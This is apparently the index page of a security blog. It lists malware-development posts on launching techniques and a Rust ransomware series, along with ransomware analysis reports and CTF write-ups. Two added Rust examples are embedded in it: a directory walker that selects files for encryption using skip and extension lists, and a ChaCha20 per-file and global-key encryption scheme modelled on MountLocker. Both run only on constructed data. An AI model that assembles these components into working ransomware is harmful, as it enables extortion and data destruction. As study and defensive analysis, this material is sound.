Malware Development
-
Malware Launching - Packing
1. Context
When I first started in malware development, the question I always had in the back of my mind was how malware can be launched, since a lot of AV programs are evolving to detect more and more malicious executables nowadays.
AVs are heavily dependent on the signatures of an executable to...
-
Malware Launching - Process Hollowing
1. Context
This is another malware launching technique that I have been really interested in learning about. The idea behind malware launching is that you have a malicious executable and you want to execute it like a normal process on the machine.
However, most average Windows users are aware of...
-
Malware Launching - DLL Injection
1. Context
Ever since I started malware development, I’ve always been interested in the concept of malware launching.
The idea is that a malware launcher is a type of malware that downloads or unpacks and then executes another piece of malware. The goal of the launcher is to set things up so that the malicious activity of the...
-
Rust Ransomware (Part 3)
Traversing Windows Directories and Privilege Escalation
1. Traverse and Encrypt
Having implemented the encryption routine in Part 2, we now need to traverse the directories on the victim's computer to find the files to encrypt.
Typically, directories and files are a bit complicated to process if you want to traverse through...
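As an added example, not code from the Rust Ransomware series itself, here is the recursive walk this step describes, written in Rust with the standard library only. The skip list of directory names and the list of target extensions are assumptions for illustration, and the directory tree it walks is constructed by the code under the OS temp dir. Read from the defender's side, the two lists are exactly what an analyst pulls out of a sample as indicators: which directories it refuses to enter and which extensions it hunts.

```rust
use std::fs;
use std::path::{Path, PathBuf};

// Assumed-for-illustration lists: directories the walker refuses to descend into
// (so the OS keeps booting and the ransom note can still be shown) and the file
// extensions it considers worth encrypting. Real samples carry much longer lists.
const SKIP_DIRS: &[&str] = &["Windows", "Program Files", "Program Files (x86)", "$Recycle.Bin"];
const TARGET_EXTS: &[&str] = &["docx", "xlsx", "pdf", "jpg", "txt"];

/// True if the directory's own name is on the skip list (case-insensitive, like NTFS).
fn should_skip_dir(dir: &Path) -> bool {
    dir.file_name()
        .and_then(|n| n.to_str())
        .map_or(false, |n| SKIP_DIRS.iter().any(|s| s.eq_ignore_ascii_case(n)))
}

/// True if the file's extension is on the target list (case-insensitive).
fn is_target_file(file: &Path) -> bool {
    file.extension()
        .and_then(|e| e.to_str())
        .map_or(false, |e| TARGET_EXTS.iter().any(|t| t.eq_ignore_ascii_case(e)))
}

/// Depth-first walk from `root`, appending every candidate file to `out`.
/// Unreadable directories are skipped rather than aborting the whole walk, and
/// symlinks are never followed, so a link loop cannot recurse forever.
fn collect_targets(root: &Path, out: &mut Vec<PathBuf>) {
    let entries = match fs::read_dir(root) {
        Ok(entries) => entries,
        Err(_) => return, // e.g. access denied: move on to the next directory
    };
    for entry in entries.flatten() {
        let path = entry.path();
        let kind = match entry.file_type() {
            Ok(kind) => kind, // file_type() does not follow symlinks
            Err(_) => continue,
        };
        if kind.is_symlink() {
            continue;
        }
        if kind.is_dir() {
            if !should_skip_dir(&path) {
                collect_targets(&path, out);
            }
        } else if kind.is_file() && is_target_file(&path) {
            out.push(path);
        }
    }
}

/// Builds a small constructed directory tree under the OS temp dir so the walk
/// can be exercised offline; returns the root so the caller can clean it up.
fn build_demo_tree(tag: &str) -> PathBuf {
    let root = std::env::temp_dir().join(format!("traverse_demo_{}_{}", std::process::id(), tag));
    let files = [
        "Documents/report.docx",      // target: matching extension
        "Pictures/photo.JPG",         // target: extension match is case-insensitive
        "notes.txt",                  // target: file directly under the root
        "Windows/System32/ntdll.dll", // skipped: inside a protected directory
        "bin/tool.exe",               // skipped: extension not on the list
    ];
    for &rel in files.iter() {
        let p = root.join(rel);
        fs::create_dir_all(p.parent().unwrap()).unwrap();
        fs::write(&p, b"demo").unwrap();
    }
    root
}

/// Walks the constructed tree and returns the candidate paths relative to the
/// root, sorted, with forward slashes so the result is the same on every OS.
fn demo_targets(tag: &str) -> Vec<String> {
    let root = build_demo_tree(tag);
    let mut found = Vec::new();
    collect_targets(&root, &mut found);
    let _ = fs::remove_dir_all(&root);
    let mut rel: Vec<String> = found
        .iter()
        .map(|p| p.strip_prefix(&root).unwrap().to_string_lossy().replace('\\', "/"))
        .collect();
    rel.sort();
    rel
}

fn main() {
    for path in demo_targets("main") {
        println!("would encrypt: {}", path);
    }
}
```

Two details matter more than they look: `file_type()` does not follow symlinks, so a link loop cannot recurse forever, and an unreadable directory is skipped instead of aborting the walk, which is why such a walk keeps going past access-denied errors on a real system.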
-
Rust Ransomware (Part 2)
Crypto and How Ransomware Encrypts Your Files
1. Ransomware and Encryption
A typical ransomware is just a malicious program that encrypts your files with some method, making them unusable, and holds them for ransom.
If the victim wants the files back, they have to pay and have the malware author decrypt the...
-
Rust Ransomware (Part 1)
Setting Up & Implementing Anti-Reversing Techniques in Malware
Set up
- To set up this lab, please make sure you have a recent version of Rust installed.
- Create a folder on your computer and change into that directory from your Command Prompt
Reverse Engineering
-
PLAY Ransomware
-
LockBit Ransomware v2.0
-
Rook Ransomware
-
Diavol Ransomware
-
AtomSilo Ransomware
-
BlackMatter Ransomware v2.0
-
MountLocker Ransomware
Overview
This is my report for a MountLocker Ransomware v5.0 sample, which is used by the XingLocker ransomware group.
This ransomware uses a hybrid-cryptography scheme of RSA-2048 and ChaCha20 to encrypt files and protect its keys. Unlike other ransomware, MountLocker encrypts all of the ChaCha20 keys with a global ChaCha20 key before encrypting this global key with...
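To make the key hierarchy concrete, here is an added example (not MountLocker's code, and not from the Rust Ransomware series) that models the scheme for both the Part 2 excerpt above and this paragraph: each file gets its own ChaCha20 key, and every file key is wrapped under one global ChaCha20 key. ChaCha20 is implemented from RFC 8439 using only the Rust standard library and checked against the RFC's block-function test vector. The per-file record layout, the key and nonce values, and the choice to start the block counter at 0 are assumptions for the example; the RSA-2048 layer that would protect the global key is left out.

```rust
// Added example: a model of the two-layer ChaCha20 key hierarchy, standard library only.

const CHACHA_CONSTANTS: [u32; 4] = [0x6170_7865, 0x3320_646e, 0x7962_2d32, 0x6b20_6574];
// First 16 keystream bytes of the RFC 8439 section 2.3.2 block-function test vector.
const RFC8439_KEYSTREAM_HEAD: [u8; 16] = [
    0x10, 0xf1, 0xe7, 0xe4, 0xd1, 0x3b, 0x59, 0x15, 0x50, 0x0f, 0xdd, 0x1f, 0xa3, 0x20, 0x71, 0xc4,
];

fn le_u32(b: &[u8]) -> u32 {
    u32::from_le_bytes([b[0], b[1], b[2], b[3]])
}

fn quarter_round(s: &mut [u32; 16], a: usize, b: usize, c: usize, d: usize) {
    s[a] = s[a].wrapping_add(s[b]); s[d] ^= s[a]; s[d] = s[d].rotate_left(16);
    s[c] = s[c].wrapping_add(s[d]); s[b] ^= s[c]; s[b] = s[b].rotate_left(12);
    s[a] = s[a].wrapping_add(s[b]); s[d] ^= s[a]; s[d] = s[d].rotate_left(8);
    s[c] = s[c].wrapping_add(s[d]); s[b] ^= s[c]; s[b] = s[b].rotate_left(7);
}

/// One 64-byte ChaCha20 keystream block for (key, counter, nonce), per RFC 8439.
fn chacha20_block(key: &[u8; 32], counter: u32, nonce: &[u8; 12]) -> [u8; 64] {
    let mut state = [0u32; 16];
    state[..4].copy_from_slice(&CHACHA_CONSTANTS);
    for i in 0..8 { state[4 + i] = le_u32(&key[4 * i..]); }
    state[12] = counter;
    for i in 0..3 { state[13 + i] = le_u32(&nonce[4 * i..]); }
    let mut w = state;
    for _ in 0..10 { // 10 double rounds = 20 rounds
        for &(a, b, c, d) in &[(0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15), // columns
                               (0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14)] { // diagonals
            quarter_round(&mut w, a, b, c, d);
        }
    }
    let mut out = [0u8; 64];
    for i in 0..16 {
        out[4 * i..4 * i + 4].copy_from_slice(&w[i].wrapping_add(state[i]).to_le_bytes());
    }
    out
}

/// XORs `data` with the keystream starting at block counter 0 (an assumption of this
/// example); encrypting and decrypting are the same operation.
fn chacha20_xor(key: &[u8; 32], nonce: &[u8; 12], data: &[u8]) -> Vec<u8> {
    let mut out = Vec::with_capacity(data.len());
    for (i, chunk) in data.chunks(64).enumerate() {
        let ks = chacha20_block(key, i as u32, nonce);
        out.extend(chunk.iter().zip(ks.iter()).map(|(p, k)| p ^ k));
    }
    out
}

/// What the scheme leaves on disk per file: ciphertext plus the file key wrapped
/// under the global key. The record layout is an assumption for this example.
struct EncryptedFile {
    ciphertext: Vec<u8>,
    file_nonce: [u8; 12],
    wrapped_key: [u8; 32],
    wrap_nonce: [u8; 12],
}

fn encrypt_file(plaintext: &[u8], file_key: &[u8; 32], file_nonce: [u8; 12],
                global_key: &[u8; 32], wrap_nonce: [u8; 12]) -> EncryptedFile {
    let ciphertext = chacha20_xor(file_key, &file_nonce, plaintext);
    let mut wrapped_key = [0u8; 32];
    wrapped_key.copy_from_slice(&chacha20_xor(global_key, &wrap_nonce, file_key));
    EncryptedFile { ciphertext, file_nonce, wrapped_key, wrap_nonce }
}

/// The decryptor's side: with the global key, unwrap the file key, then decrypt.
/// Without it the wrapped key is indistinguishable from random bytes.
fn decrypt_file(f: &EncryptedFile, global_key: &[u8; 32]) -> Vec<u8> {
    let mut file_key = [0u8; 32];
    file_key.copy_from_slice(&chacha20_xor(global_key, &f.wrap_nonce, &f.wrapped_key));
    chacha20_xor(&file_key, &f.file_nonce, &f.ciphertext)
}

/// Sanity check of the block function against the RFC 8439 test vector
/// (key 00..1f, nonce 00 00 00 09 00 00 00 4a 00 00 00 00, counter 1).
fn rfc8439_block_vector_ok() -> bool {
    let mut key = [0u8; 32];
    for (i, b) in key.iter_mut().enumerate() { *b = i as u8; }
    let nonce = [0, 0, 0, 9, 0, 0, 0, 0x4a, 0, 0, 0, 0];
    chacha20_block(&key, 1, &nonce)[..16] == RFC8439_KEYSTREAM_HEAD[..]
}

fn main() {
    println!("RFC 8439 block vector ok: {}", rfc8439_block_vector_ok());
    // Constructed keys and nonces; a real sample draws these from a CSPRNG per file.
    let global_key = [0x5a; 32];
    let enc = encrypt_file(b"budget.xlsx contents", &[0xa5; 32], [1; 12], &global_key, [2; 12]);
    let dec = decrypt_file(&enc, &global_key);
    println!("ciphertext: {} bytes, wrapped key starts {:02x?}", enc.ciphertext.len(), &enc.wrapped_key[..8]);
    println!("round-trip with global key ok: {}", dec == b"budget.xlsx contents");
}
```

The decryptor-side function is the point: whoever holds the global key can unwrap every file key, so in this design a single leaked or recovered global key is a full decryptor, whereas a scheme that wrapped each file key directly under RSA would need the private key for every file.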
-
Darkside Ransomware
Overview
This is my report for one of the latest Windows samples of Darkside Ransomware v1.8.6.2!
Since there is not a lot of in-depth analysis on Darkside out there, I decided to just write one myself.
Darkside uses the aPLib algorithm to compress its configuration and a hybrid-cryptography scheme of custom RSA-1024 and Salsa20 to encrypt files...
-
Babuk Ransomware v3
Overview
This is a short report for the latest Babuk ransomware sample. This sample is marked as version 3 based on the run-once mutex string.
For this new version, the malware author keeps most of the old functionality the same except for the encryption scheme and the multithreading approach.
Since I have covered Babuk old...
-
Babuk Ransomware
Overview
This is my report for the new Babuk Ransomware that appeared at the beginning of 2021.
Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see such...
-
Conti Ransomware v2
Overview
This is my full analysis of Conti Ransomware version 2. Over the last few months, I have seen quite a few companies getting hit by this ransomware, so it’s been interesting analyzing it and figuring out how it works.
As one of the newer ransomware families, Conti utilizes multi-threading features on Windows to encrypt files...
-
RegretLocker
Summary
RegretLocker is a new ransomware that has been found in the wild in the last month. Unlike other ransomware, it does not only encrypt normal files on disk: when running, it specifically searches for VHD files, mounts them using the Windows Virtual Storage API, and then encrypts all the files it finds inside those VHD...
-
Zero2Automated Custom Sample Full Analysis
1. Context
I have been super bored after Flare-On 7 ended, and I’m too lazy to finish the rest of the writeups for it… As a result, I ended up signing up for Zero2Automated by Vitali Kremez and 0verfl0w to keep myself busy while sharpening my malware analysis skills!
This...
-
Flare-On 7 - Challenge 2
After unzipping the challenge, we get a single Windows executable. This is the prompt given by the author.
One of our team members developed a Flare-On challenge but accidentally deleted it. We recovered it using extreme digital forensic techniques but it seems to be corrupted. We would fix it but we are too busy solving today's...
-
Flare-On 7 - Challenge 1
After unzipping the challenge, we get two Python files, an EXE file, and a folder containing images used by the game. This prompt is given by the challenge’s author.
Welcome to the Seventh Flare-On Challenge! This is a simple game. Win it by any means necessary and the victory screen...
-
Reversing.kr - Ransomware
1. Context
This is the fourth post of my reversing series following the previous posts about Reversing.kr.
This time, the challenge is Ransomware. From this name, I guess we will be dealing with encrypted files!
2. Ransomware
First, when we unzip the zip file, we get 2 files, file and ransomware.exe.
Since there...
-
Reversing.kr - Replace
1. Context
This is the third post of my reversing series following the previous posts about Reversing.kr.
This time, I’ll be working on the next challenge, Replace. I got 0 context from this name, so I actually can’t guess the functionality of this executable before trying static analysis.
2. Replace
First, like always,...
-
Reversing.kr - Easy Keygen
1. Context
This is the next post of my reversing series following the previous post about Reversing.kr here.
This time, I’ll be working on the next challenge, Easy Keygen. Like the name implies, this type of challenge is for us to be able to reverse a key generation for a specific value...
-
Reversing.kr - Easy Crack
1. Context
I’ve been working at Union Pacific on the network design team, so I have not had much practice with reverse engineering lately.
Since FLARE-On 2020 from FireEye is coming next weekend, I figure that I should do some reversing this weekend to prepare for it.
I have picked Reversing.kr to...
-
PE File Parser
1. Context
I have been doing a lot of malware analysis recently, but I realized I do not know much about the entire structure of a PE file. It has really been annoying having to look up what each component is and where it is in memory every time I need it.
I have already implemented...
-
CSCML2020 Reverse Engineering Write-up
1. TimeTravel
This task’s prompt was about time travelling, so I first assumed that it had to do with time manipulation inside the executable.
When I first ran the executable, this is what I got. It seems like we just go through these dialogs forever, and nothing is...
-
How I "hacked" my way through a CS homework
1. Context
I’m currently taking a Computer Science course at Georgia Tech called CS 2110 - Computer Organization and Programming. I have taken the exact same course from the ECE department, but since I changed my major, those classes don’t count toward my credit…
And here we are, grinding...
Network Engineering
-
Open Shortest Path First - Routing Protocol
1. Context
I’m starting my network engineering internship with Union Pacific in a week, and my managers have been asking me to review networking concepts that the company frequently uses.
One of the important ones is OSPF, as I think it is our main link-state routing protocol within...